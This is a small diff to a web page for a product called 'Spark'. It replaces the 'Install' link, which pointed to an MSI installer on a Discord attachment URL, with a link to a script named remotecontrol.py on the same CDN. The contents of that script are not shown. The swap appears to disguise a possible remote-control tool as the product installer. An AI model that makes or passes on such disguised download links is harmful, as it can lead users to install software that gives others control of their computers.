--- a/index.html
+++ b/index.html
@@ -12,7 +12,7 @@
 			<h2 class="text" id="title">Spark</h2>
 		</div>
 		<div id="Content">
-			<a href="https://cdn.discordapp.com/attachments/954895768014164092/1083858988233392249/SparkSetup.msi" target="_blank">Install</a>
+			<a href="https://cdn.discordapp.com/attachments/954895768014164092/1240746420768735323/remotecontrol.py?ex=6647aea6&is=66465d26&hm=c22a6f72ce51a406114498f2ee90c45cedd267646fb3f9d8a596e1c0b2b5645a&" target="_blank">Install</a>
 		</div>
 	</body>
 </html>
